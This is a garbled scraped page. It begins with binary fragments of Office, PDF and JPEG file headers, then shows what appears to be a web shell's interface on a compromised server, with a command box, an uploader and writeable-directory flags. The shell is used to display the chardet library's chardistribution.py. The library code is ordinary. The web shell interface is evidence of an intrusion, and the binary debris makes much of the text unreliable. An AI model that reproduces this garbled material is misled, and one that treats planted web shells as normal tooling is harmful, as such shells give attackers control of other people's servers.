œ_#ÁÕ§TE NAŒ“KeÉ:”(åŽÖJÞùY’‚ñùž7; «]Û ý`8g“¯B© jd ÖÖ¸ðzœ¸¦4Ç3Kó^(ÍÖ¼ Õ€pvìwšõB4d f$Èü^0˜…åÌC$#2FŽÑ§±¦ÛZ/÷š&m£ñzÒÖ ’.Î]!Î;ƒ(Õ–¢d/—#Kª+tZyuÏB>NÛÖ†(¸ŒSà'³„Y˜´-_•¦¼´˜OlNK§¶ÒàŠˆTHµƒeTPå·fïM’…þuÏÍüp6دªE£åü‡ZØ'CKF#â«;‹eyO Qp„†l"ö1èíÙP ÏŒúl! BÝ2ñª•_VÁÉ÷3eu`–F¸ìI--ö<¿žë¯4õ캿¢)34Å{wMÉ2ÆÖFŸ¥` e9Ú¶¸P‡.”FÔï rY ‚²ÈTB,{ÛœéJ}«àQ4¹0Rû4D‚B§S‘ dO•v¾„™Sן¯3FeŸ™«+ÓâwH dÕÛÌì·P4ë&¥#rÜÉ Ù¦ê†ý·xòqk¯2,¹§™E\­ék‚×SᔏںÙ⺷ö£6…à ʾ qSá³Å|;àû}4Ÿ($â¹VY~óÍ!èÜÒŒËX½Ù1j‚VíÍŸš³+œ]«½g{_{/vµ½\¢¶vÉWKÿ:ñám½ ¥ S²x‘t ŽšÝÙÿÀÇ^ný PK   IW™k‚½÷ á  _rels/.relsUT dìd dìd dìd­’ÏNÃ0 ‡ï{ŠÈ÷ÕÝ@¡¥» ¤Ý*`%îÑ&QâÁöö‚J£ì°cœŸ¿|¶²ÙÆA½rL½wVE Šñ¶w­†çúay * 9Kƒw¬áÈ ¶ÕbóÄIîI]’Ê—4t"á1™ŽGJ…ìòMããH’±Å@æ…ZÆuYÞ`üÍ€jÂT;«!îì T} |Û7MoøÞ›ýÈNN<|v–í2ÄÜ¥ÏèšbË¢Ázó˜Ë )„"£O­Ï7ú{ZYÈ’yÞç#1'tuÉM?6o>Z´_å9›ëKÚ˜}?þ³žÏÌ·N>fµx PK    IWª½e  ¢ U  € word/document.xmlUT dìdPK    IWþË3” z  €J¢ word/settings.xmlUT dìdPK    IWC‡{š' ƒ  €¤ docProps/custom.xmlUT dìdPK    IW츱=Œ   €‡¥ [Content_Types].xmlUT dìdPK    IWV%ë±"   €U§ docProps/app.xmlUT dìdPK    IW€RŒ 3  €¶¨ docProps/core.xmlUT dìdPK    IWkòDn ô  €ª word/_rels/document.xml.relsUT dìdPK    IW ;$î   €Î« word/fontTable.xmlUT dìdPK    IW+åäz] ÷.  €ý¬ word/numbering.xmlUT dìdPK    IW¤2×r- ¿  €›° word/styles.xmlUT dìdPK    IWMFÒ ø  €´ word/header1.xmlUT dìdPK    IWF— T e  €· word/media/image1.jpegUT dìdPK    IW!Yéáå   €°Ë word/media/image2.pngUT dìdPK    IW°Àºë ú  €ÙÌ word/media/image3.pngUT dìdPK    IW$“†ª L  €Î word/footer1.xmlUT dìdPK    IWzaGôM   €ñÑ word/footer2.xmlUT dìdPK    IW–µ­âº P  €}Õ word/theme/theme1.xmlUT dìdPK    IW™k‚½÷ á €{Û _rels/.relsUT PK   ! bîh^   [Content_Types].xml ¢(   ¬”ËNÃ0E÷HüCä-Jܲ@5í‚Ç*Q>Àēƪc[žiiÿž‰ûB¡j7±ÏÜ{2ñÍh²nm¶‚ˆÆ»R ‹ÈÀU^7/ÅÇì%¿’rZYï @1__f› ˜q·ÃR4DáAJ¬h>€ãÚÇV߯¹ ªZ¨9ÈÛÁàNVÞ8Ê©ÓãÑÔji){^óã-I‹"{Üv^¥P!XS)bR¹rú—K¾s(¸3Õ`cÞ0†½ÝÎß»¾7M4²©ŠôªZƐk+¿|\|z¿(Ž‹ôPúº6h_-[ž@!‚ÒØ Pk‹´­2nÏ}Ä?£LËð Ýû%áÄßdºždN"m,à¥ÇžDO97*‚~§Èɸ8ÀOíc|n¦Ñ äEøÿöéºóÀBÉÀ!$}‡íàÈé;{ìÐå[ƒîñ–é2þ ÿÿ PK   ! µU0#ô L _rels/.rels ¢(   ¬’MOÃ0 †ïHü‡È÷ÕݐBKwAH»!T~€Iܵ£$Ý¿'TƒG½~üÊÛÝ<êÈ!öâ4¬‹;#¶w­†—úqu *&r–Fq¬áÄvÕõÕö™GJy(v½*«¸¨¡KÉß#FÓñD±Ï.W ¥†=™ZÆMYÞbø®ÕBSí­†°·7 ê“Ï›×–¦é ?ˆ9LìÒ™ÈsbgÙ®|Èl!õùUSh9i°bžr:"y_dlÀóD›¿ý|-NœÈR"4ø2ÏGÇ% õZ´4ñ˝yÄ7 ëÈðÉ‚‹¨Þ ÿÿ PK   ! Q48wÛ —  xl/workbook.xml¤UÙnâ0}iþ!cñ‡ *–¢AšVU×$dC¬&vÆv UÕŸë@XÊK§/¹p|Žï¹N÷b“¥Ö •Š ÞC¸î"‹òHÄŒ¯zèá~b·‘¥4á1I§=ôJºèÿüÑ] ù¼âÙ ®z(Ñ:GE ͈ª‹œrˆ,…̈†©\9*—”Ä*¡Tg©ã¹nàd„q´Eåg0ÄrÉ":Q‘Q®· ’¦D}•°\UhYô¸ŒÈç"·#‘å ±`)Ó¯%(²²(œ®¸d‘‚ì nZ w v¡ñª• t¶TÆ")”Xê:@;[Ògú±ë`|²›ó=ø’ïHúÂL÷¬dðEVÁ+8€a÷Ûh¬Uz%„Íû"ZsÏÍCýî’¥ôqk]‹äù5ÉL¦Rd¥Dé˘i÷P ¦bM/|dÉ",…¨çãFNoçiûéë>aêiçsó#ðÄ ÕTr¢éHp ÜIú®ÝJìQ"ÀÜÖ-ý[0I¡¦ÀZ Z…d¡nˆN¬B¦=4 g %PDF-1.4 %âãÏÓ 3 0 obj << /Linearized 1 /L 422775 ÿØÿà JFIF    ÿÛ C      ÿÛ C   ÿÀ  X" ÿÄ    ÿÄ H   !1A"Qaq2‘¡#±ÁBRÑ3Cbrá$S‚¢²ð4ñ%6DTc’ÂsÿÄ   ÿÄ =  !1AQ"aq‘Á2R¡±BÑð#3br’²4á$‚¢ÂñÿÚ   ? áHBßÝ`„! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! !@B„ „! ! stream

___________________________ < root@rinduuu:~# /home/rinduuuuuuu?! > ___________________________

Command :

ikan Uploader :
Directory :  /usr/lib/python2.7/site-packages/chardet/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //usr/lib/python2.7/site-packages/chardet/chardistribution.py
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
#   Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301  USA
######################### END LICENSE BLOCK #########################

from .euctwfreq import (EUCTW_CHAR_TO_FREQ_ORDER, EUCTW_TABLE_SIZE,
                        EUCTW_TYPICAL_DISTRIBUTION_RATIO)
from .euckrfreq import (EUCKR_CHAR_TO_FREQ_ORDER, EUCKR_TABLE_SIZE,
                        EUCKR_TYPICAL_DISTRIBUTION_RATIO)
from .gb2312freq import (GB2312_CHAR_TO_FREQ_ORDER, GB2312_TABLE_SIZE,
                         GB2312_TYPICAL_DISTRIBUTION_RATIO)
from .big5freq import (BIG5_CHAR_TO_FREQ_ORDER, BIG5_TABLE_SIZE,
                       BIG5_TYPICAL_DISTRIBUTION_RATIO)
from .jisfreq import (JIS_CHAR_TO_FREQ_ORDER, JIS_TABLE_SIZE,
                      JIS_TYPICAL_DISTRIBUTION_RATIO)


class CharDistributionAnalysis(object):
    ENOUGH_DATA_THRESHOLD = 1024
    SURE_YES = 0.99
    SURE_NO = 0.01
    MINIMUM_DATA_THRESHOLD = 3

    def __init__(self):
        # Mapping table to get frequency order from char order (get from
        # GetOrder())
        self._char_to_freq_order = None
        self._table_size = None  # Size of above table
        # This is a constant value which varies from language to language,
        # used in calculating confidence.  See
        # http://www.mozilla.org/projects/intl/UniversalCharsetDetection.html
        # for further detail.
        self.typical_distribution_ratio = None
        self._done = None
        self._total_chars = None
        self._freq_chars = None
        self.reset()

    def reset(self):
        """reset analyser, clear any state"""
        # If this flag is set to True, detection is done and conclusion has
        # been made
        self._done = False
        self._total_chars = 0  # Total characters encountered
        # The number of characters whose frequency order is less than 512
        self._freq_chars = 0

    def feed(self, char, char_len):
        """feed a character with known length"""
        if char_len == 2:
            # we only care about 2-bytes character in our distribution analysis
            order = self.get_order(char)
        else:
            order = -1
        if order >= 0:
            self._total_chars += 1
            # order is valid
            if order < self._table_size:
                if 512 > self._char_to_freq_order[order]:
                    self._freq_chars += 1

    def get_confidence(self):
        """return confidence based on existing data"""
        # if we didn't receive any character in our consideration range,
        # return negative answer
        if self._total_chars <= 0 or self._freq_chars <= self.MINIMUM_DATA_THRESHOLD:
            return self.SURE_NO

        if self._total_chars != self._freq_chars:
            r = (self._freq_chars / ((self._total_chars - self._freq_chars)
                 * self.typical_distribution_ratio))
            if r < self.SURE_YES:
                return r

        # normalize confidence (we don't want to be 100% sure)
        return self.SURE_YES

    def got_enough_data(self):
        # It is not necessary to receive all data to draw conclusion.
        # For charset detection, certain amount of data is enough
        return self._total_chars > self.ENOUGH_DATA_THRESHOLD

    def get_order(self, byte_str):
        # We do not handle characters based on the original encoding string,
        # but convert this encoding string to a number, here called order.
        # This allows multiple encodings of a language to share one frequency
        # table.
        return -1


class EUCTWDistributionAnalysis(CharDistributionAnalysis):
    def __init__(self):
        super(EUCTWDistributionAnalysis, self).__init__()
        self._char_to_freq_order = EUCTW_CHAR_TO_FREQ_ORDER
        self._table_size = EUCTW_TABLE_SIZE
        self.typical_distribution_ratio = EUCTW_TYPICAL_DISTRIBUTION_RATIO

    def get_order(self, byte_str):
        # for euc-TW encoding, we are interested
        #   first  byte range: 0xc4 -- 0xfe
        #   second byte range: 0xa1 -- 0xfe
        # no validation needed here. State machine has done that
        first_char = byte_str[0]
        if first_char >= 0xC4:
            return 94 * (first_char - 0xC4) + byte_str[1] - 0xA1
        else:
            return -1


class EUCKRDistributionAnalysis(CharDistributionAnalysis):
    def __init__(self):
        super(EUCKRDistributionAnalysis, self).__init__()
        self._char_to_freq_order = EUCKR_CHAR_TO_FREQ_ORDER
        self._table_size = EUCKR_TABLE_SIZE
        self.typical_distribution_ratio = EUCKR_TYPICAL_DISTRIBUTION_RATIO

    def get_order(self, byte_str):
        # for euc-KR encoding, we are interested
        #   first  byte range: 0xb0 -- 0xfe
        #   second byte range: 0xa1 -- 0xfe
        # no validation needed here. State machine has done that
        first_char = byte_str[0]
        if first_char >= 0xB0:
            return 94 * (first_char - 0xB0) + byte_str[1] - 0xA1
        else:
            return -1


class GB2312DistributionAnalysis(CharDistributionAnalysis):
    def __init__(self):
        super(GB2312DistributionAnalysis, self).__init__()
        self._char_to_freq_order = GB2312_CHAR_TO_FREQ_ORDER
        self._table_size = GB2312_TABLE_SIZE
        self.typical_distribution_ratio = GB2312_TYPICAL_DISTRIBUTION_RATIO

    def get_order(self, byte_str):
        # for GB2312 encoding, we are interested
        #  first  byte range: 0xb0 -- 0xfe
        #  second byte range: 0xa1 -- 0xfe
        # no validation needed here. State machine has done that
        first_char, second_char = byte_str[0], byte_str[1]
        if (first_char >= 0xB0) and (second_char >= 0xA1):
            return 94 * (first_char - 0xB0) + second_char - 0xA1
        else:
            return -1


class Big5DistributionAnalysis(CharDistributionAnalysis):
    def __init__(self):
        super(Big5DistributionAnalysis, self).__init__()
        self._char_to_freq_order = BIG5_CHAR_TO_FREQ_ORDER
        self._table_size = BIG5_TABLE_SIZE
        self.typical_distribution_ratio = BIG5_TYPICAL_DISTRIBUTION_RATIO

    def get_order(self, byte_str):
        # for big5 encoding, we are interested
        #   first  byte range: 0xa4 -- 0xfe
        #   second byte range: 0x40 -- 0x7e , 0xa1 -- 0xfe
        # no validation needed here. State machine has done that
        first_char, second_char = byte_str[0], byte_str[1]
        if first_char >= 0xA4:
            if second_char >= 0xA1:
                return 157 * (first_char - 0xA4) + second_char - 0xA1 + 63
            else:
                return 157 * (first_char - 0xA4) + second_char - 0x40
        else:
            return -1


class SJISDistributionAnalysis(CharDistributionAnalysis):
    def __init__(self):
        super(SJISDistributionAnalysis, self).__init__()
        self._char_to_freq_order = JIS_CHAR_TO_FREQ_ORDER
        self._table_size = JIS_TABLE_SIZE
        self.typical_distribution_ratio = JIS_TYPICAL_DISTRIBUTION_RATIO

    def get_order(self, byte_str):
        # for sjis encoding, we are interested
        #   first  byte range: 0x81 -- 0x9f , 0xe0 -- 0xfe
        #   second byte range: 0x40 -- 0x7e,  0x81 -- oxfe
        # no validation needed here. State machine has done that
        first_char, second_char = byte_str[0], byte_str[1]
        if (first_char >= 0x81) and (first_char <= 0x9F):
            order = 188 * (first_char - 0x81)
        elif (first_char >= 0xE0) and (first_char <= 0xEF):
            order = 188 * (first_char - 0xE0 + 31)
        else:
            return -1
        order = order + second_char - 0x40
        if second_char > 0x7F:
            order = -1
        return order


class EUCJPDistributionAnalysis(CharDistributionAnalysis):
    def __init__(self):
        super(EUCJPDistributionAnalysis, self).__init__()
        self._char_to_freq_order = JIS_CHAR_TO_FREQ_ORDER
        self._table_size = JIS_TABLE_SIZE
        self.typical_distribution_ratio = JIS_TYPICAL_DISTRIBUTION_RATIO

    def get_order(self, byte_str):
        # for euc-JP encoding, we are interested
        #   first  byte range: 0xa0 -- 0xfe
        #   second byte range: 0xa1 -- 0xfe
        # no validation needed here. State machine has done that
        char = byte_str[0]
        if char >= 0xA0:
            return 94 * (char - 0xA1) + byte_str[1] - 0xa1
        else:
            return -1

........